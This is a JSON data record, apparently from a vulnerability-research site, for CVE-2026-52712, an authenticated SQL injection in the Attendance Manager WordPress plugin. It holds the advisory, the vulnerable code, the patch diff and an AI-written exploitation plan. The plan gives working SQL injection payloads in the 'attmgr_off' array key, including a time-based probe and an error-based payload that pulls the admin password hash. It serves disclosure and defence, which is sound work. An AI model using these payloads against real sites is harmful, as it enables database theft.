[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fNNagVRbBySllecrEGCBBHME4Y8xcK-hyZBIckamjP3M":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-52712","attendance-manager-authenticated-subscriber-sql-injection","Attendance Manager \u003C= 0.6.2 - Authenticated (Subscriber+) SQL Injection","The Attendance Manager plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 0.6.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","attendance-manager",null,"\u003C=0.6.2","0.6.3","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-06-15 00:00:00","2026-06-23 15:46:56",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe1167864-1d46-40cb-bd75-e0d921e173c9?source=api-prod",9,[22,23,24,25,26,27,28,29],"attendance-manager.php","class\u002Fclass-activation.php","class\u002Fclass-adminpage.php","class\u002Fclass-attmgr.php","class\u002Fclass-calendar.php","class\u002Fclass-cron.php","class\u002Fclass-form.php","class\u002Fclass-info.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-52712 (Attendance Manager SQL Injection)\n\n## 1. Vulnerability Summary\nThe **Attendance Manager** plugin for WordPress (versions \u003C= 0.6.2) is vulnerable to an **authenticated SQL injection** in the `update_by_staff` and `update_by_admin` functions within the `ATTMGR_Form` class. \n\nThe vulnerability exists because the plugin takes keys from user-supplied arrays (`$_POST['attmgr_off']`) and interpolates them directly into a `DELETE` SQL statement using `sprintf` with single quotes, but without using `$wpdb->prepare()` or proper escaping (`esc_sql`). Since the payload is injected into the **key** of the array, standard sanitization often applied to values is bypassed.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php` is NOT the target here. Instead, the plugin hooks into `template_redirect`, meaning the exploit can be triggered by a `POST` request to **any frontend page** (or specifically the Staff Scheduler page) where the plugin's action filter is active.\n*   **Action Trigger:** `$_POST['action'] === 'attmgr_update_by_staff'`\n*   **Vulnerable Parameter:** `attmgr_off` (specifically the **keys** of this array).\n*   **Payload Location:** `$_POST['attmgr_off'][PAYLOAD] = 1`\n*   **Required Authentication:** Subscriber-level access or higher.\n*   **Preconditions:** \n    1.  A valid WordPress nonce for the action `attmgr` (passed in the `onetimetoken` field).\n    2.  The user must be logged in as a Subscriber.\n\n## 3. Code Flow\n1.  **Entry Point:** `ATTMGR_Form::action()` is hooked to `template_redirect`.\n2.  **Filter Execution:** `action()` calls `apply_filters( ATTMGR::PLUGIN_ID.'_action', $result )`.\n3.  **Vulnerable Callback:** `ATTMGR_Form::update_by_staff($result)` is registered as a filter for `attmgr_action`.\n4.  **Nonce Check:** The function verifies the nonce: `wp_verify_nonce( $_POST['onetimetoken'], 'attmgr' )`.\n5.  **Vulnerable Logic:**\n    ```php\n    \u002F\u002F class\u002Fclass-form.php: line 65\n    if ( ! empty( $_POST[ATTMGR::PLUGIN_ID.'_off'] ) ) {\n        foreach ( $_POST[ATTMGR::PLUGIN_ID.'_off'] as $date => $value ) {\n            $del_where[] = sprintf( \"'%s'\", $date ); \u002F\u002F $date is the key from $_POST\n        }\n        $ret = $wpdb->query( \"DELETE FROM $table WHERE `staff_id`=$staff_id AND `date` IN (\".implode( ',', $del_where ).\" )\" );\n    }\n    ```\n6.  **SQL Sink:** `$wpdb->query()` executes the malformed string.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required to pass the `wp_verify_nonce` check in `update_by_staff`.\n\n1.  **Identify Page:** The plugin automatically creates a page with the slug `staff_scheduler` containing the shortcode `[attmgr_staff_scheduler]`.\n2.  **Navigation:** Use the `browser_navigate` tool to go to `\u002Fstaff_scheduler\u002F`.\n3.  **Extraction:** The shortcode renders a hidden input field for the nonce.\n    -   **Variable Name:** `onetimetoken`\n    -   **Action:** `attmgr`\n4.  **Actionable Command:**\n    ```javascript\n    browser_eval(\"document.querySelector('input[name=\\\"onetimetoken\\\"]').value\")\n    ```\n\n## 5. Exploitation Strategy\nWe will use a **time-based blind SQL injection** payload injected into the key of the `attmgr_off` array.\n\n*   **Target URL:** `http:\u002F\u002Flocalhost:8080\u002Fstaff_scheduler\u002F` (or any frontend URL).\n*   **Method:** POST\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    -   `action`: `attmgr_update_by_staff`\n    -   `onetimetoken`: `[EXTRACTED_NONCE]`\n    -   `attmgr_off[2025-01-01') AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- -]`: `1`\n\n**Draft Payload Construction:**\nThe resulting SQL query will look like:\n`DELETE FROM wp_attmgr_schedule WHERE staff_id=X AND date IN ('2025-01-01') AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- -' )`\n\n## 6. Test Data Setup\n1.  **Create Subscriber User:**\n    `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n2.  **Ensure Scheduler Page Exists:**\n    `wp post create --post_type=page --post_title=\"Staff Scheduler\" --post_name=staff_scheduler --post_status=publish --post_content='[attmgr_staff_scheduler]'`\n3.  **Verify Plugin Tables:** Ensure `wp_attmgr_schedule` exists (activated via `ATTMGR_Activation::create_table`).\n\n## 7. Expected Results\n*   **Normal Request:** The request finishes in \u003C 1 second.\n*   **Exploit Request:** The request hangs\u002Fdelays for approximately 5 seconds due to the `SLEEP(5)` command.\n*   **Success Indicator:** A measurable time delay in the HTTP response.\n\n## 8. Verification Steps\nAfter the HTTP request, confirm the vulnerability by attempting to extract the database version:\n1.  **Payload:** `2025-01-01') AND (SELECT 1 FROM (SELECT IF(SUBSTRING(VERSION(),1,1)='8',SLEEP(5),0))x)-- -`\n2.  If the response is delayed, the first digit of the MySQL version is verified as '8'.\n\n## 9. Alternative Approaches\nIf time-based injection is throttled, use **Error-Based SQL Injection** (if `WP_DEBUG` is enabled):\n*   **Payload Key:** `2025-01-01') AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)-- -`\n*   **Expected Response:** A WordPress database error message containing the admin password hash.\n\nIf `staff_scheduler` is not accessible, the exploit can be attempted via `update_by_admin` by an administrator (or a user with access to `admin_scheduler`), using the parameter `attmgr_off[STAFF_ID][PAYLOAD]`.","The Attendance Manager plugin for WordPress is vulnerable to authenticated SQL injection through the manipulation of array keys in the 'attmgr_off' parameter. The functions 'update_by_staff' and 'update_by_admin' interpolate these keys directly into DELETE SQL queries using sprintf without proper escaping or preparation, allowing users with subscriber-level access or higher to execute arbitrary SQL commands and extract sensitive database information.","\u002F\u002F class\u002Fclass-form.php:65\n\u002F\u002F OFF\n$del_where = array();\nif ( ! empty( $_POST[ATTMGR::PLUGIN_ID.'_off'] ) ) {\n    foreach ( $_POST[ATTMGR::PLUGIN_ID.'_off'] as $date => $value ) {\n        $del_where[] = sprintf( \"'%s'\", $date );\n    }\n    $ret = $wpdb->query( \"DELETE FROM $table WHERE `staff_id`=$staff_id AND `date` IN (\".implode( ',', $del_where ).\" )\" );\n}\n\n---\n\n\u002F\u002F class\u002Fclass-form.php:134\n\u002F\u002F OFF\nif ( ! empty( $_POST[ATTMGR::PLUGIN_ID.'_off'] ) ) {\n    foreach ( $_POST[ATTMGR::PLUGIN_ID.'_off'] as $staff_id => $data ) {\n        $del_where = array();\n        foreach ( $data as $date => $value ) {\n            $del_where[] = sprintf( \"'%s'\", $date );\n        }\n        $ret = $wpdb->query( \"DELETE FROM $table WHERE `staff_id`=$staff_id AND `date` IN (\".implode( ',', $del_where ).\" )\" );\n    }\n}","--- class\u002Fclass-form.php\n+++ class\u002Fclass-form.php\n@@ -68,7 +68,7 @@\n \t\t\tif ( ! empty( $_POST[ATTMGR::PLUGIN_ID.'_off'] ) ) {\n \t\t\t\tforeach ( $_POST[ATTMGR::PLUGIN_ID.'_off'] as $date => $value ) {\n-\t\t\t\t\t$del_where[] = sprintf( \"'%s'\", $date );\n+\t\t\t\t\t$del_where[] = $wpdb->prepare( '%s', $date );\n \t\t\t\t}\n \t\t\t\t$ret = $wpdb->query( \"DELETE FROM $table WHERE `staff_id`=$staff_id AND `date` IN (\".implode( ',', $del_where ).\" )\" );\n \t\t\t}\n@@ -137,7 +137,7 @@\n \t\t\t\t\tforeach ( $data as $date => $value ) {\n-\t\t\t\t\t\t$del_where[] = sprintf( \"'%s'\", $date );\n+\t\t\t\t\t\t$del_where[] = $wpdb->prepare( '%s', $date );\n \t\t\t\t\t}\n \t\t\t\t\t$ret = $wpdb->query( \"DELETE FROM $table WHERE `staff_id`=$staff_id AND `date` IN (\".implode( ',', $del_where ).\" )\" );","The exploit targets the 'template_redirect' hook by submitting a POST request to a frontend page with the 'action' parameter set to 'attmgr_update_by_staff'. An authenticated attacker (Subscriber+) must first obtain a valid 'onetimetoken' nonce, typically found on the plugin's 'Staff Scheduler' page. The payload is injected into the key of the 'attmgr_off' array. Because the plugin processes these keys using sprintf inside a loop and concatenates them into a DELETE statement without sanitization, an attacker can break out of the string literal and append malicious SQL, such as a time-based blind injection (SLEEP) or error-based extraction.","gemini-3-flash-preview","2026-06-26 00:05:32","2026-06-26 00:06:19",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","0.6.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fattendance-manager\u002Ftags\u002F0.6.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fattendance-manager.0.6.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fattendance-manager\u002Ftags\u002F0.6.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fattendance-manager.0.6.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fattendance-manager\u002Ftags"]